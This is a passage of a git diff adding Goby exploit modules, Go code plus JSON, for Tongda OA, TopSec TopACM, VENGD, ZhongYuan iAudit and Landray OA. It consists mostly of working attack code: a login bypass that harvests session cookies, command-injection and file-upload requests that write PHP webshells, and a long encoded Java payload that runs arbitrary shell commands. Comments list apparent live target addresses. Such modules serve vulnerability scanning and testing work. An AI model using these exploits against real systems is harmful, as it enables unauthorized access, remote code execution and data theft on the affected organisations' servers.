", + "VulType": [ + "Command Execution" + ], + "Tags": [ + "Command Execution" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + nil, + nil, + )) +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt b/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt new file mode 100644 index 000000000..50348eb27 --- /dev/null +++ b/lib/goby/goby_pocs/Tongda OA Arbitrary User Login Vulnerability.txt @@ -0,0 +1,232 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "regexp" + "strings" +) + +func init() { + expJson := `{ + "Name": "Tongda OA Arbitrary User Login Vulnerability", + "Description": "

Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "Product": "Tongda-OA", + "Homepage": "https://www.tongda2000.com/", + "DisclosureDate": "2021-05-20", + "Author": "su18@javaweb.org", + "FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", + "GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", + "Level": "3", + "Impact": "

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "Recommendation": "

Please follow the manufacturer's website to update it in time. https://www.tongda2000.com/

", + "References": [ + "https://fofa.so/" + ], + "Is0day": true, + "HasExp": true, + "ExpParams": [], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "Login Bypass" + ], + "VulType": [ + "Login Bypass" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.0", + "Translation": { + "CN": { + "Name": "通达 OA 任意用户登陆漏洞", + "Product": "通达-OA", + "Description": "

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。

通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。

", + "Recommendation": "

请联系官方厂商进行更新。https://www.tongda2000.com/

", + "Impact": "

通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。

", + "VulType": [ + "登录绕过" + ], + "Tags": [ + "登录绕过" + ] + }, + "EN": { + "Name": "Tongda OA Arbitrary User Login Vulnerability", + "Product": "Tongda-OA", + "Description": "

Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "Recommendation": "

Please follow the manufacturer's website to update it in time. https://www.tongda2000.com/

", + "Impact": "

Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.

", + "VulType": [ + "Login Bypass" + ], + "Tags": [ + "Login Bypass" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool { + requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda") + } + return false + } + + getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string { + requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"codeuid\"") { + return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1] + } + } + return "" + } + + getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string { + requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded") + requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}" + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") { + return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1] + } + } + return "" + } + + exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/general/") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid) + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo") + } + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + if checkIsTongdaOA1231234(u) { + codeuid := getTongdaCodeUID435345(u) + if codeuid != "" { + phpsessionid := getTongdaPHPSESSID4564234(codeuid, u) + if phpsessionid != "" { + return exploitTongda45321(phpsessionid, u) + } + } + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + if checkIsTongdaOA1231234(expResult.HostInfo) { + codeuid := getTongdaCodeUID435345(expResult.HostInfo) + if codeuid != "" { + phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo) + if phpsessionid != "" { + if exploitTongda45321(phpsessionid, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "登陆成功,使用如下 session 即可登陆:" + phpsessionid + } + } + } + } + + return expResult + }, + )) +} + +// http://14.18.236.21:8000/ \ No newline at end of file diff --git a/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt b/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt new file mode 100644 index 000000000..ab95cac74 --- /dev/null +++ b/lib/goby/goby_pocs/TopSec_TopACM_Remote_Command_Execution.txt @@ -0,0 +1,77 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "net/url" + "strings" +) + +func init() { + expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"

天融信上网行为管理系统(TopACM)综合考虑各行业客户需求,为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业,协助客户规范网络、提高工作效率、挖掘数据价值。

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","Recommendation":"

目前厂商还未发布安全补丁,请关注官方更新。https://www.topsec.com.cn/product/27.html

","Impact":"

天融信上网行为管理系统存在任意命令执行漏洞,攻击者可以在系统上执行任意命令,写入文件,获取webshell,读取敏感信息。

","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","Recommendation":"

At present, the manufacturer has not released a security patch. Please pay attention to the official update.https://www.topsec.com.cn/product/27.html

","Impact":"

There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.

","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}` + + exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20" + url.QueryEscape(cmd)) + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") { + return true + } + } + return false + } + + checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + // 攻击 URL + requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Timeout = 15 + + // 发送攻击请求 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) { + return true + } + } + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + // 生成随机文件名 + randomFileName := goutils.RandomHexString(6) + + // 漏洞攻击包,POC 使用自删除的文件 + // /var/www/html/"+randomFileName+".php", u) { + return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u) + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + cmd := ss.Params["cmd"].(string) + + if exploitTopACM092348783482(cmd, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "命令执行成功" + } + + return expResult + }, + )) +} + +// https://heiwado.cn:8443/ \ No newline at end of file diff --git a/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json b/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json new file mode 100644 index 000000000..285d63013 --- /dev/null +++ b/lib/goby/goby_pocs/VENGD_Arbitrary_File_Upload_variant.json @@ -0,0 +1,161 @@ +{ + "Name": "VENGD Arbitrary File Upload", + "Level": "3", + "Tags": [ + "getshell" + ], + "GobyQuery": "title=\"和信下一代云桌面VENGD\"", + "Description": "和信创天云桌面系统存在任意文件上传", + "Product": "VENGD", + "Homepage": "https://www.vesystem.com/products/3", + "Author": "aetkrad", + "Impact": "", + "Recommendation": "", + "References": [ + "https://blog.csdn.net/weixin_44146996/article/details/115611026" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "FileContent", + "Type": "input", + "Value": "<?php phpinfo(); ?>" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "POST", + "uri": "/Upload/upload_file.php?l=test", + "follow_redirect": false, + "header": { + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" + }, + "data_type": "text", + "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n\n------WebKitFormBoundaryfcKRltGv--", + "set_variable": [ + "str1|rand|str|7", + "r1|rand|int|8" + ] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + }, + { + "Request": { + "method": "GET", + "uri": "/Upload/test/{{{r1}}}.php", + "follow_redirect": false, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "{{{str1}}}", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "POST", + "uri": "/Upload/upload_file.php?l=test", + "follow_redirect": false, + "header": { + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" + }, + "data_type": "text", + "data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--", + "set_variable": [ + "r1|rand|int|8" + ] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + }, + { + "Request": { + "method": "GET", + "uri": "/Upload/test/{{{r1}}}.php", + "follow_redirect": false, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|define|text|/Upload/test/{{{r1}}}.php" + ] + } + ], + "PostTime": "2021-12-09 13:55:04", + "GobyVersion": "1.9.310" +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt b/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt new file mode 100644 index 000000000..f2e867f63 --- /dev/null +++ b/lib/goby/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.txt @@ -0,0 +1,104 @@ +package exploits + +import ( + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE", + "Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability", + "Product": "ZhongYuan iAudit", + "Homepage": "https://www.tosec.com.cn/", + "DisclosureDate": "2021-06-01", + "Author": "PeiQi", + "GobyQuery": "body=\"admin.php?controller=admin_index&action=chklogin&ref\"", + "Level": "3", + "Impact": "

The existence of command splicing leads to remote command execution vulnerability

", + "Recommendation": "", + "References": [ + "http://wiki.peiqi.tech" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "Cmd", + "type": "input", + "value": "id" + } + ], + "ScanSteps": [ + "AND" + ], + "ExploitSteps": null, + "Tags": [ + "RCE" + ], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": [ + "WangKang Next generation firewall" + ], + "Support": null, + "Service": null, + "System": null, + "Hardware": null + }, + "Recommandation": "

Upgrade version

" +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + randomStr := goutils.RandomHexString(8) + ".php" + uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1" + cfg_1 := httpclient.NewGetRequestConfig(uri_1) + cfg_1.VerifyTls = false + cfg_1.FollowRedirect = false + cfg_1.Header.Store("Content-type", "application/json") + if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil { + if resp.StatusCode == 200 { + uri_2 := "/" + randomStr + cfg_2 := httpclient.NewGetRequestConfig(uri_2) + cfg_2.VerifyTls = false + cfg_2.FollowRedirect = false + cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded") + if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid") + } + } + } + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + randomStr := goutils.RandomHexString(8) + ".php" + cmd := ss.Params["Cmd"].(string) + uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1" + cfg_1 := httpclient.NewGetRequestConfig(uri_1) + cfg_1.VerifyTls = false + cfg_1.FollowRedirect = false + cfg_1.Header.Store("Content-type", "application/json") + if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil { + if resp.StatusCode == 200 { + uri_2 := "/" + randomStr + cfg_2 := httpclient.NewGetRequestConfig(uri_2) + cfg_2.VerifyTls = false + cfg_2.FollowRedirect = false + cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded") + if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil { + expResult.Output = resp.Utf8Html + expResult.Success = true + } + } + } + return expResult + }, + )) +} \ No newline at end of file diff --git a/lib/goby/goby_pocs/landray_oa_treexml_rce.txt b/lib/goby/goby_pocs/landray_oa_treexml_rce.txt new file mode 100644 index 000000000..afd9a3787 --- /dev/null +++ b/lib/goby/goby_pocs/landray_oa_treexml_rce.txt @@ -0,0 +1,167 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" +) + +func init() { + expJson := `{ + "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞", + "Description": "

蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限

", + "Product": "蓝凌OA", + "Homepage": "www.landray.com.cn", + "DisclosureDate": "2022-07-18", + "Author": "", + "FofaQuery": "app=\"Landray-OA系统\"", + "GobyQuery": "app=\"Landray-OA系统\"", + "Level": "3", + "Impact": "", + "Recommendation": "", + "References": [ + "http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "command", + "type": "input", + "value": "whoami", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "POST", + "uri": "/data/sys-common/treexml.tmpl", + "follow_redirect": true, + "header": { + "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", + "Accept-Encoding": "gzip, deflate", + "cmd": "echo This page has a bug", + "Accept": "*/*", + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "This page has a bug", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "POST", + "uri": "/data/sys-common/treexml.tmpl", + "follow_redirect": true, + "header": { + "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", + "Accept-Encoding": "gzip, deflate", + "cmd": "{{{command}}}", + "Accept": "*/*", + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": 